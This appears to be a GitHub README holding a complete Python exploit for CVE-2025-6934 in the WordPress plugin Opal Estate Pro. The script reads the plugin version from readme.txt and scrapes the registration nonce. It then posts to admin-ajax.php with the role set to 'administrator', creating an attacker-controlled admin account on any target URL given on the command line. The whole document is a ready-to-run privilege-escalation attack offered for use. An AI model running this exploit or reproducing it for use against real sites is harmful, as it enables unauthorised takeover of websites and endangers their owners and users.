README.md
Rendering markdown...
import argparse
import requests
import re
import time
from urllib.parse import urljoin
from bs4 import BeautifulSoup
import json
# By: Khaled_alenazi (Nxploited)
requests.packages.urllib3.disable_warnings()
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
headers = {"User-Agent": user_agent}
def check_version(base_url):
readme_url = urljoin(base_url, "/wp-content/plugins/opal-estate-pro/readme.txt")
try:
response = requests.get(readme_url, verify=False, timeout=10)
if response.status_code == 200:
match = re.search(r"Stable tag:\s*([\d\.]+)", response.text)
if match:
version = match.group(1)
print("\n[•] Plugin Version Check:")
if version <= "1.7.5":
print(f" [+] Vulnerable version detected: {version}")
else:
print(f" [-] Version may not be vulnerable: {version}")
else:
print(" [-] Stable tag not found in readme.txt")
else:
print(" [-] Could not access readme.txt")
except Exception as e:
print(f" [-] Error: {e}")
def get_nonce(base_url):
try:
response = requests.get(base_url, verify=False, timeout=10, headers=headers)
soup = BeautifulSoup(response.text, "html.parser")
input_tag = soup.find("input", {"name": "opalestate-register-nonce"})
if input_tag:
return input_tag.get("value")
else:
return None
except:
return None
def exploit(base_url, email, password):
print("\n[•] Exploit Attempt Started")
nonce = get_nonce(base_url)
if not nonce:
print(" [-] Failed to retrieve nonce")
return
print(f" [+] Nonce Found: {nonce}")
target = urljoin(base_url, "/wp-admin/admin-ajax.php")
data = {
"username": "nxploitedadmin",
"email": email,
"password": password,
"password1": password,
"role": "administrator",
"confirmed_register": "on",
"opalestate-register-nonce": nonce,
"_wp_http_referer": "/",
"ajax": "1",
"action": "opalestate_register_form"
}
try:
response = requests.post(target, data=data, verify=False, headers=headers)
print(f" [+] HTTP Status: {response.status_code}")
try:
result = response.json()
if result.get("status") is True:
print("\n[✔] Exploit Successful!")
print(" --------------------------")
print(f" Username : nxploitedadmin")
print(f" Email : {email}")
print(f" Password : {password}")
print(f" Role : administrator")
print(" --------------------------")
else:
print("\n[✖] Exploit Failed!")
message = result.get("message", "")
clean_msg = BeautifulSoup(message, "html.parser").get_text().strip()
print(f" Reason: {clean_msg}")
except json.JSONDecodeError:
print("\n[✖] Unexpected response (non-JSON):")
print(response.text)
except Exception as e:
print(f" [-] Exploit Error: {e}")
print("\nExploit By: Khaled_alenazi (Nxploited) | https://github.com/Nxploited")
parser = argparse.ArgumentParser(description="CVE-2025-6934 Exploit by Khaled Alenazi (Nxploited)")
parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., http://site.com/path/)")
parser.add_argument("-mail", "--newmail", required=True, help="Email to register as admin")
parser.add_argument("-password", "--newpassword", required=True, help="Password for new admin user")
args = parser.parse_args()
check_version(args.url)
exploit(args.url, args.newmail, args.newpassword)